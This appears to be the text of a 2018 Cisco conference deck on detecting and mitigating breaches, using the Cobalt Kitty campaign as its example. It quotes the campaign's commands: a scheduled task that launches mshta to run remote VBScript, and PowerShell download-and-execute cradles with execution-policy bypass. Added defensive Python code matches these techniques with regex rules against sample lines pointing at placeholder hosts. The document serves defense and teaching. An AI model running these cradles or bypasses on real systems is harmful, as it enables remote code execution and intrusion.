breach detection and mitigation - cisco · 19 - 21 march 2018 | cisco connect | rovinj, croatia...


Page 1: Breach Detection and Mitigation - Cisco · 19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia Advanced Adversary 5 • A step below government- sponsored attackers but much more

Breach Detection and Mitigation: Practical Examples

Dragan Novakovic, Consulting Systems Engineer


19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia

Challenges Today

• Many discrete security products
• Information overload
• High cost of attacker attribution
• Inefficient breach mitigation process


Advanced Adversary

• A step below government-sponsored attackers but much more widespread
• Individuals or organized groups, not governments
• Going after a smaller number of targets but higher profits per target
• Capable of steering infections individually
• Going after $$ - intellectual property, access and user data


Advanced Attack Commonalities

• Sandboxing & analysis evasion
• Misuse of legitimate resources
• Low forensic footprint
• Layers of scripting
• Steganography
• Stable C&C


From The Trenches: Cobalt Kitty Campaign

§ Well-documented campaign
§ Reveals the latest attack techniques & tactics
§ Resulted in compromise of a domain admin account and a severe data breach

Source: https://www2.cybereason.com/asset/60:research-cobalt-kitty-attack-lifecycle

Attack lifecycle stages: Delivery → Exploitation → Installation → Persistence → Lateral Movement → Exfiltration


From The Trenches: Cobalt Kitty Campaign (Delivery)

Spear-phishing – email containing links to a fake Flash update
– Users likely to grant admin rights
– Downloads and executes Cobalt Strike Beacon (post-exploitation tool)

Microsoft Office Word document with macros
– Macro creates simple scheduled tasks using cmd.exe
– Windows AppLocker script-blocking policy bypass using regsvr32.exe (Metasploit: exploit/windows/misc/regsvr32_applocker_bypass_server)
– Run PowerShell with rundll32 to bypass software restrictions (https://github.com/p3nt4/PowerShdll)


From The Trenches: Cobalt Kitty Campaign (Exploitation)

Scheduled task creation, launching a Microsoft HTML Application that executes VBScript:

schtasks /create /sc MINUTE /tn "Windows Error Reporting" /tr "mshta.exe about:'<script language=\"vbscript\" src=\"http:xxx/microsoftp.jpg\">code close</script>'" /mo 15 /F

The VBScript runs a cmd command that starts PowerShell; PowerShell executes the downloaded script (the Cobalt Strike Beacon):

Set objShell = CreateObject("Wscript.Shell")
intReturn = objShell.Run("powershell -execute bypass -com ""IEX ((new-object net.webclient).downloadstring('hxxp://xx/image.jpg'))""")

Chain: scheduled task creation → Microsoft HTML Application VBScript execution → cmd command run from VB → PowerShell script execution → Cobalt Strike Beacon


From The Trenches: Cobalt Kitty Campaign (Persistence)

Persistence mechanisms
– Windows Scheduled Tasks
– Windows Services
– Windows Registry Autorun keys

DLL hijacking
– Using legitimate software to execute a trojanized DLL
– Abuses a DLL not being there by default OR the search order in which it is loaded
– Examples: Windows Search loading msfte.dll; Google Update loading goopdate.dll


From The Trenches: Cobalt Kitty Campaign (Lateral Movement)

File-less credential and hash stealing
– Modified version of Mimikatz (file-less)
– Modified version of a password file dumper

Lateral movement
– Pass-the-hash and pass-the-ticket attacks
– Use of Windows Management Instrumentation (WMI) for remote execution


From The Trenches: Cobalt Kitty Campaign (Lateral Movement)

File-less scanning using PowerUp
– Scanning for open ports, vulnerable services and OS fingerprinting using an externally hosted PowerShell script loaded into memory (PowerShell Invoke-Expression, file-less download, PowerUp method):

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks"

https://blogs.technet.microsoft.com/heyscriptingguy/2014/03/19/creating-a-port-scanner-with-windows-powershell/
https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
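Defender-side detection logic for the command-line patterns shown on the Exploitation and Lateral Movement slides (scheduled task launching mshta, PowerShell download cradle with execution-policy bypass, regsvr32 loading a remote scriptlet, rundll32 with PowerShdll). This is an added example, not code from the deck or the campaign report; the sample process-creation lines, the example.invalid hosts and the rule names are constructed for it.

```python
import re

# Constructed sample process-creation command lines (not real telemetry), modelled on the
# Cobalt Kitty techniques in the slides; example.invalid stands in for attacker hosts.
SAMPLE_CMDLINES = [
    r'''schtasks /create /sc MINUTE /tn "Windows Error Reporting" /tr "mshta.exe about:'<script language=\"vbscript\" src=\"http://example.invalid/microsoftp.jpg\">code close</script>'" /mo 15 /F''',
    "powershell -execute bypass -com \"IEX ((new-object net.webclient).downloadstring('http://example.invalid/image.jpg'))\"",
    "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/PowerUp.ps1'); Invoke-AllChecks\"",
    "regsvr32.exe /s /n /u /i:http://example.invalid/file.sct scrobj.dll",
    r"rundll32.exe C:\Users\Public\PowerShdll.dll,main Get-Process",
    r'schtasks /create /sc DAILY /tn "Nightly Backup" /tr "C:\Tools\backup.exe" /st 02:00',  # benign
    r"powershell.exe -File C:\Scripts\inventory.ps1",                                       # benign
]

# Each rule is one technique from the slides; names are this example's own labels.
RULES = {
    # schtasks creating a task whose action is mshta with an inline "about:" script
    "mshta_scheduled_task": re.compile(r"schtasks.*?/create.*?mshta(?:\.exe)?\s+about:", re.I),
    # mshta running a <script> tag that pulls its body from a remote src
    "mshta_remote_script": re.compile(r"mshta.*?<script[^>]*\bsrc=", re.I),
    # IEX over a WebClient download: the in-memory (file-less) cradle used for Beacon and PowerUp
    "powershell_download_cradle": re.compile(
        r"powershell.*?(?:IEX|Invoke-Expression).*?(?:DownloadString|DownloadFile|WebClient)", re.I),
    # -exec / -execute / -executionpolicy bypass
    "powershell_exec_bypass": re.compile(r"powershell.*?-exec\w*\s+bypass", re.I),
    # regsvr32 /i: pointed at an http(s) URL (the AppLocker bypass named on the Delivery slide)
    "regsvr32_remote_scriptlet": re.compile(r"regsvr32.*?/i:https?://", re.I),
    # rundll32 hosting PowerShell through PowerShdll
    "rundll32_powershdll": re.compile(r"rundll32.*?PowerShdll", re.I),
}


def classify(cmdline):
    """Return the sorted list of rule names that match one process command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(cmdlines):
    """Return only the suspicious entries as (cmdline, matched_rules) pairs."""
    hits = []
    for line in cmdlines:
        matched = classify(line)
        if matched:
            hits.append((line, matched))
    return hits


if __name__ == "__main__":
    for line, rules in scan(SAMPLE_CMDLINES):
        print(", ".join(rules), "<-", line[:80])
```

The regexes key on the tool-to-tool chain (schtasks → mshta, rundll32 → PowerShdll, PowerShell → IEX + WebClient) rather than on the attacker's host names, so they keep matching when the URLs change.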


From The Trenches: Cobalt Kitty Campaign (Exfiltration)

– C&C and exfiltration using NetCat, DNS tunnelling & Cobalt Strike Malleable C2
– Outlook scripts send exfiltrated data via email to a Gmail address


© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 14

"The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him"

Sun Tzu, The Art of War


1. Hinder In-Advance Attack Preparation


1. Hinder In-Advance Attack Preparation

✓ Cognitive Threat Analytics
– Internal state
– Passive
– No feeds


1. Hinder In-Advance Attack Preparation

✓ StealthWatch
– Passive
– Lateral movement
– Baselining


2. Deploy Generic C&C Detectors

✓ Umbrella Investigate
– Predictive algorithms
– Automatic takedown
– Co-occurrences


2. Deploy Generic C&C Detectors

✓ Cognitive Threat Analytics
– Uncover the entire infrastructure
– Behavior and context
– Including low & slow and steganography-based channels


2. Deploy Generic C&C Detectors

✓ Encrypted Traffic Analytics (Stealthwatch)
Detects malicious traffic by analyzing:
– Initial data packet
– Hostname
– Certificate information
– Supported cipher suites
– Packet size/timing in TLS-based connections
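To make the "initial data packet" features concrete, the following added example (not Cisco code, and not how ETA is implemented) parses a raw TLS ClientHello and pulls out the hostname (SNI), the offered cipher suites and the record length, then applies a toy triage of its own. The ClientHello builder exists only to construct test input offline; LEGACY_SUITES and the thresholds in observations() are the example's assumptions.

```python
import struct

# Cipher suites this toy triage treats as legacy when a client offers them
# (RSA/RC4-MD5, RSA/3DES, RSA/AES128-CBC-SHA); the set is this example's, not ETA's.
LEGACY_SUITES = {0x0004, 0x000A, 0x002F}


def build_client_hello(server_name, cipher_suites):
    """Build a minimal TLS 1.2 ClientHello record; used only to construct test input."""
    ext = b""
    if server_name is not None:                        # server_name extension (type 0)
        name = server_name.encode()
        entry = b"\x00" + struct.pack("!H", len(name)) + name
        lst = struct.pack("!H", len(entry)) + entry
        ext = struct.pack("!HH", 0, len(lst)) + lst
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (b"\x03\x03" + bytes(32) + b"\x00"          # version, random, empty session id
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00"                              # one compression method: null
            + struct.pack("!H", len(ext)) + ext)
    hs = b"\x01" + len(body).to_bytes(3, "big") + body  # handshake type 1 = ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs


def parse_client_hello(record):
    """Extract the initial-data-packet features the slide lists from a raw ClientHello."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if not hs or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    pos = 4                                            # handshake type + 3-byte length
    version = struct.unpack("!H", hs[pos:pos + 2])[0]
    pos += 2 + 32                                      # skip version and client random
    pos += 1 + hs[pos]                                 # skip session id
    cs_len = struct.unpack("!H", hs[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack("!H", hs[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + hs[pos]                                 # skip compression methods
    sni = None
    if pos + 2 <= len(hs):
        end = pos + 2 + struct.unpack("!H", hs[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= end:                          # walk the extension list
            etype, elen = struct.unpack("!HH", hs[pos:pos + 4])
            pos += 4
            if etype == 0 and elen >= 5:               # server_name: list len(2) type(1) len(2) name
                name_len = struct.unpack("!H", hs[pos + 3:pos + 5])[0]
                sni = hs[pos + 5:pos + 5 + name_len].decode("ascii", "replace")
            pos += elen
    return {"version": version, "sni": sni, "cipher_suites": suites, "record_len": rec_len}


def observations(features):
    """Toy triage on the extracted features; thresholds are this example's, not ETA's."""
    notes = []
    if any(s in LEGACY_SUITES for s in features["cipher_suites"]):
        notes.append("legacy_cipher_offered")
    if not features["sni"]:
        notes.append("no_sni")
    if len(features["cipher_suites"]) < 4:
        notes.append("short_cipher_list")
    return notes
```

A real ETA deployment would add the server certificate and the packet size/timing sequence from the rest of the flow; this block covers only what can be read from the first client packet.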


3. Stream Endpoint and Network Level Traces

Do:
§ Collect and have at hand endpoint and network activity logs

Because:
§ Coding errors happen
§ Mistakes happen
§ Detections due to definition updates happen


3. Stream Endpoint and Network Level Traces

✓ AMP for Endpoints
– Collects traces
– Retrospection
– Root cause analysis
– Exploit prevention
– Heuristic detection


3. Stream Endpoint and Network Level Traces

✓ StealthWatch
– NetFlow for security


3. Stream Endpoint and Network Level Traces

✓ Threat Grid
– Global database
– Indicators of compromise
– Pivoting and context


4. Use Vendor with Large Threat Research Team

✓ TALOS

THREAT INTEL
– 250+ full-time threat intel researchers
– Millions of telemetry agents
– 1100+ threat traps
– 100+ threat intelligence partners
– 1.5 million daily malware samples
– 600 billion daily email messages
– 16 billion daily web requests
– 20 billion threats blocked
– Sources: honeypots, open source communities, vulnerability discovery (internal), product telemetry, internet-wide scanning

INTEL SHARING
– Customer data sharing programs
– Service provider coordination program
– Open source intel sharing
– 3rd party programs (MAPP)
– Industry sharing partnerships (ISACs)
– 500+ participants



5. Deploy Full Detector Stack

More detectors → more complex malware caught, but bugs, cost & risk increase

Detector stack:
– FW/NGFW
– NGIPS
– Antivirus
– Reputation/Rules
– Policy/Patches
– Content Filtering
– Sandboxing
– Anomaly
– Machine Learning


Everything is Configured…Now what?


Breach Detection and Mitigation - Practically!

Breach Detection
– Detecting a breach
– Establishing priority rating

Immediate Reaction
– Following traces from C&C to a file
– Estimating spread on the endpoint and in the network
– Reviewing related network activity

Final Reaction
– Finding additional malicious activity on the endpoint
– Analyzing the root cause
– Reimaging the affected endpoints
– Updating policies to prevent reinfection


Breach Detection and Mitigation Process

• CTA detects C2 channel (or Umbrella or Investigate or IoC or Talos)

• TG provides global and local file behavior context (endpoint level details)

• AMP identifies files responsible for C&C activity and provides endpoint visibility

• AMP quarantines malicious executables and blocks their further reintroduction

• ISE quarantines the endpoint

• AMP is used for root cause analysis before the endpoint is re-imaged

All steps need to be done within hours to prevent data leaks!


Notification About a Breach

– Daily reports in CTA
– Weekly reports in AMP

Too slow!


Notification About a Breach - Better!

§ Subscribe to email alerts
§ Use a SIEM for more granular control


Establishing Priority Rating: AMP and Threat Grid threat prioritization


Establishing Priority Rating: CTA threat prioritization

Risk level | Meaning | Action
Low Risk | Network only | Try clean; if failed, monitor
Medium Risk | Light infection | Try clean; if failed, reimage
High Risk | Bad infection | Reimage
Critical Risk | Data damage | Quarantine, reimage

Establishing Priority Rating: Demo: AMP Event Correlation

Step 1: Breach Detection


Demo: Breach Detection

Step 2: Immediate Reaction


Demo: Immediate Reaction


Automatic response with ISE

Flow: CTA incident → (HTTP(S), logs, STIX/TAXII) → ISE → device quarantine


Block Everywhere - AMP Unity

AMP Cloud (Device Trajectory; whitelists and blacklists; customer-specific) shared across:
– Network appliances: NGIPS, NGFW
– Endpoints
– Content appliances: WSA, ESA (WWW)

Step 3: Final Reaction


Demo: Final Reaction


Complex Malware Revealed

Malware injection path:
– PowerShell privilege escalation
– Browser extension installation
– Stealing browser credentials

Would be prevented by ISE quarantine


Browser Exfiltration Module Revealed

C:/Users/Student1/AppData/Roaming/Mozilla/Firefox/Profiles/…/chrome/content/overlay.js


Technologies Used

• AMP for Endpoints
• Cognitive Threat Analytics
• Threat Grid
• StealthWatch
• AMP Visibility
• ISE